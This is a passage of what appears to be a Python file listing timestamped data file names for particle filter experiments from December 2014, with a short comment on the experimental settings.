'data3Tue_Dec_30_23_52_28_2014.txt',
'data3Tue_Dec_30_23_52_43_2014.txt',
'data3Tue_Dec_30_23_52_58_2014.txt',
'data3Tue_Dec_30_23_53_12_2014.txt',
'data3Tue_Dec_30_23_53_27_2014.txt',
'data3Tue_Dec_30_23_53_42_2014.txt',
'data3Tue_Dec_30_23_53_56_2014.txt',
'data3Tue_Dec_30_23_54_11_2014.txt',
'data3Tue_Dec_30_23_54_26_2014.txt',
'data3Tue_Dec_30_23_54_41_2014.txt',
'data3Tue_Dec_30_23_54_56_2014.txt',
'data3Tue_Dec_30_23_55_11_2014.txt',
'data3Tue_Dec_30_23_55_26_2014.txt',
'data3Tue_Dec_30_23_55_41_2014.txt',
'data3Tue_Dec_30_23_55_55_2014.txt',
'data3Tue_Dec_30_23_56_10_2014.txt',
'data3Tue_Dec_30_23_56_25_2014.txt',
'data3Tue_Dec_30_23_56_40_2014.txt',
'data0Tue_Dec_30_23_57_21_2014.txt',
'data0Tue_Dec_30_23_57_36_2014.txt',
'data0Tue_Dec_30_23_57_51_2014.txt',
'data0Tue_Dec_30_23_58_06_2014.txt',
'data0Tue_Dec_30_23_58_20_2014.txt',
'data0Tue_Dec_30_23_58_35_2014.txt',
'data0Tue_Dec_30_23_58_50_2014.txt',
'data0Tue_Dec_30_23_59_05_2014.txt',
'data0Tue_Dec_30_23_59_20_2014.txt',
'data0Tue_Dec_30_23_59_35_2014.txt',
'data0Tue_Dec_30_23_59_49_2014.txt',
'data0Wed_Dec_31_00_00_04_2014.txt',
'data0Wed_Dec_31_00_00_18_2014.txt',
'data0Wed_Dec_31_00_00_33_2014.txt',
'data0Wed_Dec_31_00_00_48_2014.txt',
'data0Wed_Dec_31_00_01_02_2014.txt',
'data0Wed_Dec_31_00_01_17_2014.txt',
'data0Wed_Dec_31_00_01_32_2014.txt',
'data0Wed_Dec_31_00_01_48_2014.txt',
'data0Wed_Dec_31_00_02_02_2014.txt',
'data0Wed_Dec_31_00_02_18_2014.txt',
'data0Wed_Dec_31_00_02_32_2014.txt',
'data0Wed_Dec_31_00_02_47_2014.txt',
'data0Wed_Dec_31_00_03_01_2014.txt',
'data0Wed_Dec_31_00_03_17_2014.txt',
'data0Wed_Dec_31_00_03_32_2014.txt',
'data0Wed_Dec_31_00_03_46_2014.txt',
'data0Wed_Dec_31_00_04_01_2014.txt',
'data0Wed_Dec_31_00_04_16_2014.txt',
'data0Wed_Dec_31_00_04_31_2014.txt',
'data0Wed_Dec_31_00_04_46_2014.txt',
'data0Wed_Dec_31_00_05_00_2014.txt',
'data0Wed_Dec_31_00_05_15_2014.txt',
'data0Wed_Dec_31_00_05_31_2014.txt',
'data0Wed_Dec_31_00_05_46_2014.txt',
'data0Wed_Dec_31_00_06_01_2014.txt',
'data0Wed_Dec_31_00_06_15_2014.txt',
'data0Wed_Dec_31_00_06_30_2014.txt',
'data0Wed_Dec_31_00_06_45_2014.txt',
'data0Wed_Dec_31_00_07_00_2014.txt',
'data0Wed_Dec_31_00_07_14_2014.txt',
'data0Wed_Dec_31_00_07_29_2014.txt',
'data0Wed_Dec_31_00_07_44_2014.txt',
'data0Wed_Dec_31_00_07_59_2014.txt',
'data0Wed_Dec_31_00_08_13_2014.txt',
'data0Wed_Dec_31_00_08_28_2014.txt',
'data0Wed_Dec_31_00_08_43_2014.txt',
'data0Wed_Dec_31_00_08_57_2014.txt',
'data0Wed_Dec_31_00_09_12_2014.txt',
'data0Wed_Dec_31_00_09_27_2014.txt',
'data1Wed_Dec_31_00_09_42_2014.txt',
'data1Wed_Dec_31_00_09_57_2014.txt',
'data1Wed_Dec_31_00_10_11_2014.txt',
'data1Wed_Dec_31_00_10_26_2014.txt',
'data1Wed_Dec_31_00_10_41_2014.txt',
'data1Wed_Dec_31_00_10_56_2014.txt',
'data1Wed_Dec_31_00_11_11_2014.txt',
'data1Wed_Dec_31_00_11_26_2014.txt',
'data1Wed_Dec_31_00_11_40_2014.txt',
'data1Wed_Dec_31_00_11_55_2014.txt',
'data1Wed_Dec_31_00_12_10_2014.txt',
'data1Wed_Dec_31_00_12_25_2014.txt',
'data1Wed_Dec_31_00_12_40_2014.txt',
'data1Wed_Dec_31_00_12_54_2014.txt',
'data1Wed_Dec_31_00_13_09_2014.txt',
'data1Wed_Dec_31_00_13_24_2014.txt',
'data1Wed_Dec_31_00_13_39_2014.txt',
'data1Wed_Dec_31_00_13_54_2014.txt',
'data1Wed_Dec_31_00_14_09_2014.txt',
'data1Wed_Dec_31_00_14_24_2014.txt',
'data1Wed_Dec_31_00_14_38_2014.txt',
'data1Wed_Dec_31_00_14_53_2014.txt',
'data1Wed_Dec_31_00_15_07_2014.txt',
'data1Wed_Dec_31_00_15_22_2014.txt',
'data1Wed_Dec_31_00_15_37_2014.txt',
'data1Wed_Dec_31_00_15_52_2014.txt',
'data1Wed_Dec_31_00_16_06_2014.txt',
'data1Wed_Dec_31_00_16_22_2014.txt',
'data1Wed_Dec_31_00_16_38_2014.txt',
'data1Wed_Dec_31_00_16_52_2014.txt',
'data1Wed_Dec_31_00_17_07_2014.txt',
'data1Wed_Dec_31_00_17_22_2014.txt',
'data1Wed_Dec_31_00_17_37_2014.txt',
'data1Wed_Dec_31_00_17_51_2014.txt',
'data1Wed_Dec_31_00_18_06_2014.txt',
'data1Wed_Dec_31_00_18_20_2014.txt',
'data1Wed_Dec_31_00_18_35_2014.txt',
'data1Wed_Dec_31_00_18_50_2014.txt',
'data1Wed_Dec_31_00_19_04_2014.txt',
'data1Wed_Dec_31_00_19_19_2014.txt',
'data1Wed_Dec_31_00_19_34_2014.txt',
'data1Wed_Dec_31_00_19_48_2014.txt',
'data1Wed_Dec_31_00_20_03_2014.txt',
'data1Wed_Dec_31_00_20_18_2014.txt',
'data1Wed_Dec_31_00_20_33_2014.txt',
'data1Wed_Dec_31_00_20_48_2014.txt',
'data1Wed_Dec_31_00_21_03_2014.txt',
'data1Wed_Dec_31_00_21_18_2014.txt',
'data1Wed_Dec_31_00_21_32_2014.txt',
'data1Wed_Dec_31_00_21_47_2014.txt',
'data2Wed_Dec_31_00_22_02_2014.txt',
'data2Wed_Dec_31_00_22_17_2014.txt',
'data2Wed_Dec_31_00_22_32_2014.txt',
'data2Wed_Dec_31_00_22_47_2014.txt',
'data2Wed_Dec_31_00_23_01_2014.txt',
'data2Wed_Dec_31_00_23_16_2014.txt',
'data2Wed_Dec_31_00_23_31_2014.txt',
'data2Wed_Dec_31_00_23_46_2014.txt',
'data2Wed_Dec_31_00_24_01_2014.txt',
'data2Wed_Dec_31_00_24_16_2014.txt',
'data2Wed_Dec_31_00_24_30_2014.txt',
'data2Wed_Dec_31_00_24_45_2014.txt',
'data2Wed_Dec_31_00_25_00_2014.txt',
'data2Wed_Dec_31_00_25_15_2014.txt',
'data2Wed_Dec_31_00_25_29_2014.txt',
'data2Wed_Dec_31_00_25_44_2014.txt',
'data2Wed_Dec_31_00_25_59_2014.txt',
'data2Wed_Dec_31_00_26_14_2014.txt',
'data2Wed_Dec_31_00_26_29_2014.txt',
'data2Wed_Dec_31_00_26_43_2014.txt',
'data2Wed_Dec_31_00_26_59_2014.txt',
'data2Wed_Dec_31_00_27_13_2014.txt',
'data2Wed_Dec_31_00_27_28_2014.txt',
'data2Wed_Dec_31_00_27_43_2014.txt',
'data2Wed_Dec_31_00_27_58_2014.txt',
'data2Wed_Dec_31_00_28_13_2014.txt',
'data2Wed_Dec_31_00_28_28_2014.txt',
'data2Wed_Dec_31_00_28_43_2014.txt',
'data2Wed_Dec_31_00_28_57_2014.txt',
'data2Wed_Dec_31_00_29_12_2014.txt',
'data2Wed_Dec_31_00_29_27_2014.txt',
'data2Wed_Dec_31_00_29_42_2014.txt',
'data2Wed_Dec_31_00_29_57_2014.txt',
'data2Wed_Dec_31_00_30_12_2014.txt',
'data2Wed_Dec_31_00_30_27_2014.txt',
'data2Wed_Dec_31_00_30_42_2014.txt',
'data2Wed_Dec_31_00_30_57_2014.txt',
'data2Wed_Dec_31_00_31_12_2014.txt',
'data2Wed_Dec_31_00_31_27_2014.txt',
'data2Wed_Dec_31_00_31_41_2014.txt',
'data2Wed_Dec_31_00_31_56_2014.txt',
'data2Wed_Dec_31_00_32_11_2014.txt',
'data2Wed_Dec_31_00_32_26_2014.txt',
'data2Wed_Dec_31_00_32_40_2014.txt',
'data2Wed_Dec_31_00_32_55_2014.txt',
'data2Wed_Dec_31_00_33_10_2014.txt',
'data2Wed_Dec_31_00_33_24_2014.txt',
'data2Wed_Dec_31_00_33_39_2014.txt',
'data2Wed_Dec_31_00_33_54_2014.txt',
'data2Wed_Dec_31_00_34_09_2014.txt',
'data3Wed_Dec_31_00_34_24_2014.txt',
'data3Wed_Dec_31_00_34_39_2014.txt',
'data3Wed_Dec_31_00_34_54_2014.txt',
'data3Wed_Dec_31_00_35_09_2014.txt',
'data3Wed_Dec_31_00_35_24_2014.txt',
'data3Wed_Dec_31_00_35_39_2014.txt',
'data3Wed_Dec_31_00_35_54_2014.txt',
'data3Wed_Dec_31_00_36_08_2014.txt',
'data3Wed_Dec_31_00_36_23_2014.txt',
'data3Wed_Dec_31_00_36_38_2014.txt',
'data3Wed_Dec_31_00_36_53_2014.txt',
'data3Wed_Dec_31_00_37_08_2014.txt',
'data3Wed_Dec_31_00_37_22_2014.txt',
'data3Wed_Dec_31_00_37_38_2014.txt',
'data3Wed_Dec_31_00_37_53_2014.txt',
'data3Wed_Dec_31_00_38_08_2014.txt',
'data3Wed_Dec_31_00_38_22_2014.txt',
'data3Wed_Dec_31_00_38_37_2014.txt',
'data3Wed_Dec_31_00_38_52_2014.txt',
'data3Wed_Dec_31_00_39_07_2014.txt',
'data3Wed_Dec_31_00_39_22_2014.txt',
'data3Wed_Dec_31_00_39_36_2014.txt',
'data3Wed_Dec_31_00_39_51_2014.txt',
'data3Wed_Dec_31_00_40_06_2014.txt',
'data3Wed_Dec_31_00_40_21_2014.txt',
'data3Wed_Dec_31_00_40_36_2014.txt',
'data3Wed_Dec_31_00_40_50_2014.txt',
'data3Wed_Dec_31_00_41_05_2014.txt',
'data3Wed_Dec_31_00_41_20_2014.txt',
'data3Wed_Dec_31_00_41_34_2014.txt',
'data3Wed_Dec_31_00_41_50_2014.txt',
'data3Wed_Dec_31_00_42_04_2014.txt',
'data3Wed_Dec_31_00_42_19_2014.txt',
'data3Wed_Dec_31_00_42_33_2014.txt',
'data3Wed_Dec_31_00_42_48_2014.txt',
'data3Wed_Dec_31_00_43_03_2014.txt',
'data3Wed_Dec_31_00_43_18_2014.txt',
'data3Wed_Dec_31_00_43_33_2014.txt',
'data3Wed_Dec_31_00_43_48_2014.txt',
'data3Wed_Dec_31_00_44_03_2014.txt',
'data3Wed_Dec_31_00_44_18_2014.txt',
'data3Wed_Dec_31_00_44_33_2014.txt',
'data3Wed_Dec_31_00_44_48_2014.txt',
'data3Wed_Dec_31_00_45_03_2014.txt',
'data3Wed_Dec_31_00_45_18_2014.txt',
'data3Wed_Dec_31_00_45_33_2014.txt',
'data3Wed_Dec_31_00_45_48_2014.txt',
'data3Wed_Dec_31_00_46_03_2014.txt',
'data3Wed_Dec_31_00_46_18_2014.txt', 'data3Wed_Dec_31_00_46_32_2014.txt']
<|reserved_special_token_1|>
# this is for the 12/30/2015 experiments
# varied over 1, 10, 25, 50, 100 repeat particles per particle
# 10000 particles total per filter
# bias is at 0.8 in both the "real" world (realWorld.cpp)
files = ['data0Tue_Dec_30_20_37_34_2014.txt',
'data0Tue_Dec_30_20_37_49_2014.txt',
'data0Tue_Dec_30_20_38_04_2014.txt',
'data0Tue_Dec_30_20_38_19_2014.txt',
'data0Tue_Dec_30_20_38_34_2014.txt',
'data0Tue_Dec_30_20_38_49_2014.txt',
'data0Tue_Dec_30_20_39_04_2014.txt',
'data0Tue_Dec_30_20_39_19_2014.txt',
'data0Tue_Dec_30_20_39_34_2014.txt',
'data0Tue_Dec_30_20_39_49_2014.txt',
'data0Tue_Dec_30_20_40_04_2014.txt',
'data0Tue_Dec_30_20_40_19_2014.txt',
'data0Tue_Dec_30_20_40_34_2014.txt',
'data0Tue_Dec_30_20_40_49_2014.txt',
'data0Tue_Dec_30_20_41_04_2014.txt',
'data0Tue_Dec_30_20_41_18_2014.txt',
'data0Tue_Dec_30_20_41_34_2014.txt',
'data0Tue_Dec_30_20_41_49_2014.txt',
'data0Tue_Dec_30_20_42_04_2014.txt',
'data0Tue_Dec_30_20_42_19_2014.txt',
'data0Tue_Dec_30_20_42_34_2014.txt',
'data0Tue_Dec_30_20_42_49_2014.txt',
'data0Tue_Dec_30_20_43_04_2014.txt',
'data0Tue_Dec_30_20_43_19_2014.txt',
'data0Tue_Dec_30_20_43_34_2014.txt',
'data0Tue_Dec_30_20_43_49_2014.txt',
'data0Tue_Dec_30_20_44_04_2014.txt',
'data0Tue_Dec_30_20_44_19_2014.txt',
'data0Tue_Dec_30_20_44_34_2014.txt',
'data0Tue_Dec_30_20_44_49_2014.txt',
'data0Tue_Dec_30_20_45_04_2014.txt',
'data0Tue_Dec_30_20_45_19_2014.txt',
'data0Tue_Dec_30_20_45_34_2014.txt',
'data0Tue_Dec_30_20_45_49_2014.txt',
'data0Tue_Dec_30_20_46_04_2014.txt',
'data0Tue_Dec_30_20_46_19_2014.txt',
'data0Tue_Dec_30_20_46_34_2014.txt',
'data0Tue_Dec_30_20_46_49_2014.txt',
'data0Tue_Dec_30_20_47_04_2014.txt',
'data0Tue_Dec_30_20_47_19_2014.txt',
'data0Tue_Dec_30_20_47_34_2014.txt',
'data0Tue_Dec_30_20_47_50_2014.txt',
'data0Tue_Dec_30_20_48_05_2014.txt',
'data0Tue_Dec_30_20_48_20_2014.txt',
'data0Tue_Dec_30_20_48_35_2014.txt',
'data0Tue_Dec_30_20_48_50_2014.txt',
'data0Tue_Dec_30_20_49_05_2014.txt',
'data0Tue_Dec_30_20_49_20_2014.txt',
'data0Tue_Dec_30_20_49_35_2014.txt',
'data0Tue_Dec_30_20_49_50_2014.txt',
'data1Tue_Dec_30_20_50_05_2014.txt',
'data1Tue_Dec_30_20_50_20_2014.txt',
'data1Tue_Dec_30_20_50_35_2014.txt',
'data1Tue_Dec_30_20_50_50_2014.txt',
'data1Tue_Dec_30_20_51_05_2014.txt',
'data1Tue_Dec_30_20_51_20_2014.txt',
'data1Tue_Dec_30_20_51_35_2014.txt',
'data1Tue_Dec_30_20_51_50_2014.txt',
'data1Tue_Dec_30_20_52_05_2014.txt',
'data1Tue_Dec_30_20_52_20_2014.txt',
'data1Tue_Dec_30_20_52_35_2014.txt',
'data1Tue_Dec_30_20_52_50_2014.txt',
'data1Tue_Dec_30_20_53_05_2014.txt',
'data1Tue_Dec_30_20_53_20_2014.txt',
'data1Tue_Dec_30_20_53_35_2014.txt',
'data1Tue_Dec_30_20_53_50_2014.txt',
'data1Tue_Dec_30_20_54_04_2014.txt',
'data1Tue_Dec_30_20_54_19_2014.txt',
'data1Tue_Dec_30_20_54_34_2014.txt',
'data1Tue_Dec_30_20_54_49_2014.txt',
'data1Tue_Dec_30_20_55_04_2014.txt',
'data1Tue_Dec_30_20_55_19_2014.txt',
'data1Tue_Dec_30_20_55_34_2014.txt',
'data1Tue_Dec_30_20_55_49_2014.txt',
'data1Tue_Dec_30_20_56_04_2014.txt',
'data1Tue_Dec_30_20_56_19_2014.txt',
'data1Tue_Dec_30_20_56_34_2014.txt',
'data1Tue_Dec_30_20_56_49_2014.txt',
'data1Tue_Dec_30_20_57_04_2014.txt',
'data1Tue_Dec_30_20_57_19_2014.txt',
'data1Tue_Dec_30_20_57_33_2014.txt',
'data1Tue_Dec_30_20_57_48_2014.txt',
'data1Tue_Dec_30_20_58_03_2014.txt',
'data1Tue_Dec_30_20_58_18_2014.txt',
'data1Tue_Dec_30_20_58_33_2014.txt',
'data1Tue_Dec_30_20_58_48_2014.txt',
'data1Tue_Dec_30_20_59_03_2014.txt',
'data1Tue_Dec_30_20_59_18_2014.txt',
'data1Tue_Dec_30_20_59_33_2014.txt',
'data1Tue_Dec_30_20_59_48_2014.txt',
'data1Tue_Dec_30_21_00_03_2014.txt',
'data1Tue_Dec_30_21_00_17_2014.txt',
'data1Tue_Dec_30_21_00_32_2014.txt',
'data1Tue_Dec_30_21_00_47_2014.txt',
'data1Tue_Dec_30_21_01_02_2014.txt',
'data1Tue_Dec_30_21_01_17_2014.txt',
'data1Tue_Dec_30_21_01_32_2014.txt',
'data1Tue_Dec_30_21_01_47_2014.txt',
'data1Tue_Dec_30_21_02_03_2014.txt',
'data1Tue_Dec_30_21_02_17_2014.txt',
'data2Tue_Dec_30_21_02_32_2014.txt',
'data2Tue_Dec_30_21_02_47_2014.txt',
'data2Tue_Dec_30_21_03_02_2014.txt',
'data2Tue_Dec_30_21_03_17_2014.txt',
'data2Tue_Dec_30_21_03_32_2014.txt',
'data2Tue_Dec_30_21_03_47_2014.txt',
'data2Tue_Dec_30_21_04_02_2014.txt',
'data2Tue_Dec_30_21_04_17_2014.txt',
'data2Tue_Dec_30_21_04_31_2014.txt',
'data2Tue_Dec_30_21_04_46_2014.txt',
'data2Tue_Dec_30_21_05_01_2014.txt',
'data2Tue_Dec_30_21_05_16_2014.txt',
'data2Tue_Dec_30_21_05_31_2014.txt',
'data2Tue_Dec_30_21_05_45_2014.txt',
'data2Tue_Dec_30_21_06_00_2014.txt',
'data2Tue_Dec_30_21_06_16_2014.txt',
'data2Tue_Dec_30_21_06_31_2014.txt',
'data2Tue_Dec_30_21_06_46_2014.txt',
'data2Tue_Dec_30_21_07_01_2014.txt',
'data2Tue_Dec_30_21_07_16_2014.txt',
'data2Tue_Dec_30_21_07_31_2014.txt',
'data2Tue_Dec_30_21_07_46_2014.txt',
'data2Tue_Dec_30_21_08_01_2014.txt',
'data2Tue_Dec_30_21_08_16_2014.txt',
'data2Tue_Dec_30_21_08_30_2014.txt',
'data2Tue_Dec_30_21_08_45_2014.txt',
'data2Tue_Dec_30_21_09_01_2014.txt',
'data2Tue_Dec_30_21_09_16_2014.txt',
'data2Tue_Dec_30_21_09_31_2014.txt',
'data2Tue_Dec_30_21_09_46_2014.txt',
'data2Tue_Dec_30_21_10_00_2014.txt',
'data2Tue_Dec_30_21_10_16_2014.txt',
'data2Tue_Dec_30_21_10_31_2014.txt',
'data2Tue_Dec_30_21_10_45_2014.txt',
'data2Tue_Dec_30_21_11_00_2014.txt',
'data2Tue_Dec_30_21_11_16_2014.txt',
'data2Tue_Dec_30_21_11_31_2014.txt',
'data2Tue_Dec_30_21_11_45_2014.txt',
'data2Tue_Dec_30_21_12_01_2014.txt',
'data2Tue_Dec_30_21_12_16_2014.txt',
'data2Tue_Dec_30_21_12_31_2014.txt',
'data2Tue_Dec_30_21_12_46_2014.txt',
'data2Tue_Dec_30_21_13_00_2014.txt',
'data2Tue_Dec_30_21_13_15_2014.txt',
'data2Tue_Dec_30_21_13_31_2014.txt',
'data2Tue_Dec_30_21_13_46_2014.txt',
'data2Tue_Dec_30_21_14_00_2014.txt',
'data2Tue_Dec_30_21_14_15_2014.txt',
'data2Tue_Dec_30_21_14_30_2014.txt',
'data2Tue_Dec_30_21_14_45_2014.txt',
'data3Tue_Dec_30_21_15_00_2014.txt',
'data3Tue_Dec_30_21_15_15_2014.txt',
'data3Tue_Dec_30_21_15_29_2014.txt',
'data3Tue_Dec_30_21_15_44_2014.txt',
'data3Tue_Dec_30_21_15_59_2014.txt',
'data3Tue_Dec_30_21_16_15_2014.txt',
'data3Tue_Dec_30_21_16_30_2014.txt',
'data3Tue_Dec_30_21_16_44_2014.txt',
'data3Tue_Dec_30_21_16_59_2014.txt',
'data3Tue_Dec_30_21_17_15_2014.txt',
'data3Tue_Dec_30_21_17_29_2014.txt',
'data3Tue_Dec_30_21_17_45_2014.txt',
'data3Tue_Dec_30_21_18_00_2014.txt',
'data3Tue_Dec_30_21_18_15_2014.txt',
'data3Tue_Dec_30_21_18_29_2014.txt',
'data3Tue_Dec_30_21_18_44_2014.txt',
'data3Tue_Dec_30_21_18_59_2014.txt',
'data3Tue_Dec_30_21_19_14_2014.txt',
'data3Tue_Dec_30_21_19_29_2014.txt',
'data3Tue_Dec_30_21_19_44_2014.txt',
'data3Tue_Dec_30_21_19_59_2014.txt',
'data3Tue_Dec_30_21_20_14_2014.txt',
'data3Tue_Dec_30_21_20_29_2014.txt',
'data3Tue_Dec_30_21_20_45_2014.txt',
'data3Tue_Dec_30_21_21_00_2014.txt',
'data3Tue_Dec_30_21_21_15_2014.txt',
'data3Tue_Dec_30_21_21_30_2014.txt',
'data3Tue_Dec_30_21_21_45_2014.txt',
'data3Tue_Dec_30_21_21_59_2014.txt',
'data3Tue_Dec_30_21_22_14_2014.txt',
'data3Tue_Dec_30_21_22_29_2014.txt',
'data3Tue_Dec_30_21_22_44_2014.txt',
'data3Tue_Dec_30_21_22_58_2014.txt',
'data3Tue_Dec_30_21_23_14_2014.txt',
'data3Tue_Dec_30_21_23_28_2014.txt',
'data3Tue_Dec_30_21_23_43_2014.txt',
'data3Tue_Dec_30_21_23_58_2014.txt',
'data3Tue_Dec_30_21_24_13_2014.txt',
'data3Tue_Dec_30_21_24_28_2014.txt',
'data3Tue_Dec_30_21_24_43_2014.txt',
'data3Tue_Dec_30_21_24_58_2014.txt',
'data3Tue_Dec_30_21_25_12_2014.txt',
'data3Tue_Dec_30_21_25_28_2014.txt',
'data3Tue_Dec_30_21_25_43_2014.txt',
'data3Tue_Dec_30_21_25_58_2014.txt',
'data3Tue_Dec_30_21_26_12_2014.txt',
'data3Tue_Dec_30_21_26_27_2014.txt',
'data3Tue_Dec_30_21_26_42_2014.txt',
'data3Tue_Dec_30_21_26_57_2014.txt',
'data3Tue_Dec_30_21_27_12_2014.txt',
'data0Tue_Dec_30_21_27_52_2014.txt',
'data0Tue_Dec_30_21_28_07_2014.txt',
'data0Tue_Dec_30_21_28_22_2014.txt',
'data0Tue_Dec_30_21_28_37_2014.txt',
'data0Tue_Dec_30_21_28_51_2014.txt',
'data0Tue_Dec_30_21_29_06_2014.txt',
'data0Tue_Dec_30_21_29_21_2014.txt',
'data0Tue_Dec_30_21_29_36_2014.txt',
'data0Tue_Dec_30_21_29_51_2014.txt',
'data0Tue_Dec_30_21_30_06_2014.txt',
'data0Tue_Dec_30_21_30_21_2014.txt',
'data0Tue_Dec_30_21_30_36_2014.txt',
'data0Tue_Dec_30_21_30_50_2014.txt',
'data0Tue_Dec_30_21_31_06_2014.txt',
'data0Tue_Dec_30_21_31_21_2014.txt',
'data0Tue_Dec_30_21_31_36_2014.txt',
'data0Tue_Dec_30_21_31_51_2014.txt',
'data0Tue_Dec_30_21_32_06_2014.txt',
'data0Tue_Dec_30_21_32_21_2014.txt',
'data0Tue_Dec_30_21_32_36_2014.txt',
'data0Tue_Dec_30_21_32_51_2014.txt',
'data0Tue_Dec_30_21_33_05_2014.txt',
'data0Tue_Dec_30_21_33_20_2014.txt',
'data0Tue_Dec_30_21_33_35_2014.txt',
'data0Tue_Dec_30_21_33_50_2014.txt',
'data0Tue_Dec_30_21_34_05_2014.txt',
'data0Tue_Dec_30_21_34_20_2014.txt',
'data0Tue_Dec_30_21_34_34_2014.txt',
'data0Tue_Dec_30_21_34_49_2014.txt',
'data0Tue_Dec_30_21_35_04_2014.txt',
'data0Tue_Dec_30_21_35_20_2014.txt',
'data0Tue_Dec_30_21_35_35_2014.txt',
'data0Tue_Dec_30_21_35_49_2014.txt',
'data0Tue_Dec_30_21_36_04_2014.txt',
'data0Tue_Dec_30_21_36_19_2014.txt',
'data0Tue_Dec_30_21_36_34_2014.txt',
'data0Tue_Dec_30_21_36_49_2014.txt',
'data0Tue_Dec_30_21_37_04_2014.txt',
'data0Tue_Dec_30_21_37_19_2014.txt',
'data0Tue_Dec_30_21_37_34_2014.txt',
'data0Tue_Dec_30_21_37_49_2014.txt',
'data0Tue_Dec_30_21_38_04_2014.txt',
'data0Tue_Dec_30_21_38_18_2014.txt',
'data0Tue_Dec_30_21_38_33_2014.txt',
'data0Tue_Dec_30_21_38_48_2014.txt',
'data0Tue_Dec_30_21_39_03_2014.txt',
'data0Tue_Dec_30_21_39_18_2014.txt',
'data0Tue_Dec_30_21_39_33_2014.txt',
'data0Tue_Dec_30_21_39_48_2014.txt',
'data0Tue_Dec_30_21_40_02_2014.txt',
'data1Tue_Dec_30_21_40_18_2014.txt',
'data1Tue_Dec_30_21_40_33_2014.txt',
'data1Tue_Dec_30_21_40_48_2014.txt',
'data1Tue_Dec_30_21_41_02_2014.txt',
'data1Tue_Dec_30_21_41_17_2014.txt',
'data1Tue_Dec_30_21_41_31_2014.txt',
'data1Tue_Dec_30_21_41_46_2014.txt',
'data1Tue_Dec_30_21_42_01_2014.txt',
'data1Tue_Dec_30_21_42_16_2014.txt',
'data1Tue_Dec_30_21_42_31_2014.txt',
'data1Tue_Dec_30_21_42_46_2014.txt',
'data1Tue_Dec_30_21_43_01_2014.txt',
'data1Tue_Dec_30_21_43_16_2014.txt',
'data1Tue_Dec_30_21_43_31_2014.txt',
'data1Tue_Dec_30_21_43_46_2014.txt',
'data1Tue_Dec_30_21_44_01_2014.txt',
'data1Tue_Dec_30_21_44_15_2014.txt',
'data1Tue_Dec_30_21_44_30_2014.txt',
'data1Tue_Dec_30_21_44_46_2014.txt',
'data1Tue_Dec_30_21_45_01_2014.txt',
'data1Tue_Dec_30_21_45_15_2014.txt',
'data1Tue_Dec_30_21_45_30_2014.txt',
'data1Tue_Dec_30_21_45_45_2014.txt',
'data1Tue_Dec_30_21_46_00_2014.txt',
'data1Tue_Dec_30_21_46_15_2014.txt',
'data1Tue_Dec_30_21_46_29_2014.txt',
'data1Tue_Dec_30_21_46_44_2014.txt',
'data1Tue_Dec_30_21_46_59_2014.txt',
'data1Tue_Dec_30_21_47_14_2014.txt',
'data1Tue_Dec_30_21_47_29_2014.txt',
'data1Tue_Dec_30_21_47_44_2014.txt',
'data1Tue_Dec_30_21_47_59_2014.txt',
'data1Tue_Dec_30_21_48_13_2014.txt',
'data1Tue_Dec_30_21_48_28_2014.txt',
'data1Tue_Dec_30_21_48_43_2014.txt',
'data1Tue_Dec_30_21_48_58_2014.txt',
'data1Tue_Dec_30_21_49_13_2014.txt',
'data1Tue_Dec_30_21_49_28_2014.txt',
'data1Tue_Dec_30_21_49_43_2014.txt',
'data1Tue_Dec_30_21_49_57_2014.txt',
'data1Tue_Dec_30_21_50_13_2014.txt',
'data1Tue_Dec_30_21_50_27_2014.txt',
'data1Tue_Dec_30_21_50_42_2014.txt',
'data1Tue_Dec_30_21_50_57_2014.txt',
'data1Tue_Dec_30_21_51_12_2014.txt',
'data1Tue_Dec_30_21_51_27_2014.txt',
'data1Tue_Dec_30_21_51_42_2014.txt',
'data1Tue_Dec_30_21_51_56_2014.txt',
'data1Tue_Dec_30_21_52_11_2014.txt',
'data1Tue_Dec_30_21_52_26_2014.txt',
'data2Tue_Dec_30_21_52_40_2014.txt',
'data2Tue_Dec_30_21_52_55_2014.txt',
'data2Tue_Dec_30_21_53_10_2014.txt',
'data2Tue_Dec_30_21_53_25_2014.txt',
'data2Tue_Dec_30_21_53_40_2014.txt',
'data2Tue_Dec_30_21_53_54_2014.txt',
'data2Tue_Dec_30_21_54_09_2014.txt',
'data2Tue_Dec_30_21_54_24_2014.txt',
'data2Tue_Dec_30_21_54_39_2014.txt',
'data2Tue_Dec_30_21_54_53_2014.txt',
'data2Tue_Dec_30_21_55_08_2014.txt',
'data2Tue_Dec_30_21_55_23_2014.txt',
'data2Tue_Dec_30_21_55_38_2014.txt',
'data2Tue_Dec_30_21_55_53_2014.txt',
'data2Tue_Dec_30_21_56_08_2014.txt',
'data2Tue_Dec_30_21_56_23_2014.txt',
'data2Tue_Dec_30_21_56_37_2014.txt',
'data2Tue_Dec_30_21_56_52_2014.txt',
'data2Tue_Dec_30_21_57_07_2014.txt',
'data2Tue_Dec_30_21_57_22_2014.txt',
'data2Tue_Dec_30_21_57_37_2014.txt',
'data2Tue_Dec_30_21_57_51_2014.txt',
'data2Tue_Dec_30_21_58_06_2014.txt',
'data2Tue_Dec_30_21_58_21_2014.txt',
'data2Tue_Dec_30_21_58_35_2014.txt',
'data2Tue_Dec_30_21_58_50_2014.txt',
'data2Tue_Dec_30_21_59_05_2014.txt',
'data2Tue_Dec_30_21_59_20_2014.txt',
'data2Tue_Dec_30_21_59_34_2014.txt',
'data2Tue_Dec_30_21_59_50_2014.txt',
'data2Tue_Dec_30_22_00_05_2014.txt',
'data2Tue_Dec_30_22_00_19_2014.txt',
'data2Tue_Dec_30_22_00_34_2014.txt',
'data2Tue_Dec_30_22_00_49_2014.txt',
'data2Tue_Dec_30_22_01_03_2014.txt',
'data2Tue_Dec_30_22_01_18_2014.txt',
'data2Tue_Dec_30_22_01_33_2014.txt',
'data2Tue_Dec_30_22_01_48_2014.txt',
'data2Tue_Dec_30_22_02_03_2014.txt',
'data2Tue_Dec_30_22_02_18_2014.txt',
'data2Tue_Dec_30_22_02_32_2014.txt',
'data2Tue_Dec_30_22_02_47_2014.txt',
'data2Tue_Dec_30_22_03_02_2014.txt',
'data2Tue_Dec_30_22_03_17_2014.txt',
'data2Tue_Dec_30_22_03_31_2014.txt',
'data2Tue_Dec_30_22_03_46_2014.txt',
'data2Tue_Dec_30_22_04_01_2014.txt',
'data2Tue_Dec_30_22_04_15_2014.txt',
'data2Tue_Dec_30_22_04_30_2014.txt',
'data2Tue_Dec_30_22_04_45_2014.txt',
'data3Tue_Dec_30_22_05_00_2014.txt',
'data3Tue_Dec_30_22_05_15_2014.txt',
'data3Tue_Dec_30_22_05_30_2014.txt',
'data3Tue_Dec_30_22_05_44_2014.txt',
'data3Tue_Dec_30_22_06_00_2014.txt',
